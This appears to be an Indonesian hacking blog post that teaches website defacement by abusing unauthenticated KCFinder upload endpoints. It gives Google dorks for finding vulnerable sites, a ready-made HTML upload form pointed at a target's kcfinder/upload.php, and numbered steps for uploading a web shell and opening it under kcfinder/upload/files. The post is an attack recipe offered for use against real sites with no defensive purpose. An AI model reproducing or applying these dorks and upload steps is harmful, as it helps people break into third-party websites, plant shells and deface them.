Deface poc KCFINDER

Deface KCFINDER
20181025-153526


GW BALIK LAGI NEH, Mastah minggir :v

KALI INI GW BAKALAN AJARIN DEFACE LAGI DENGAN METODE

KCFINDER :)

OK BAHAN YANG DI PERLUKAN :

-PC/ANDROID

-KONEKSI INTERNET DAN BROWSER

-DORK :

*inurl:/asset/kcfinder
*sites/all/modules/civicrm/packages/kcfinder
*inurl:templates/_editor/kcfinder/
*inurl:includes/kcfinder/browse.php
*inurl:/kcfinder/browse.php
*lib/kcfinder/files/upload 
*admin/kcfinder/files/upload
*panel/kcfinder/upload/files
*editor/kcfinder/upload
*Kcfinder/upload/files
*inurl:/panel/kcfinder/ ext:png
-CSRF
<form method="POST" action="http://target.nya/path/kcfinder/upload.php"
enctype="multipart/form-data">
<input type="file" name="Filedata" /><button>~/ nnd</button>
</form>



OK IKUTI LANGKAH SAYA YAA :)

1.DORKING DI GOOGLE.


2.PILIH TARGET LALU BUKA LINK TARGET.


3.TAMBAHKAN upload.php DI BELAKANG kcfinder/.


4.JIKA VULN MAKA AKAN MUNCUL

Unknown Error

5.MASUKAN LINKNYA KE CSRF.

6. BUKA CSRFNYA.

7.KLIK CHOOSE FILE.

8.PILIH SHELL YANG SUDAH KALIAN DOWNLOAD TADI.

9.KLIK UPLOAD.

10.JIKA BERHASIL DI UPLOAD MAKA AKAN MUNCUL PESAN KOSONG.

CARA MENGAKSES FILE SHELLNYA ADALAH :

kcfinder/upload/files/wqe.php5 [wqe.php5 ADALAH NAMA SHELL SAYA]

TADAAAA SAYA TELAH BERHASIL MENGUPLOAD SHELL :D


SAYA RASA SEKIAN TUTORIAL KALI INI :D SAMPAI JUMPA DI TUTORIAL BERIKUTNYA YA BRO :D


Post a Comment

Previous Post Next Post

Contact Form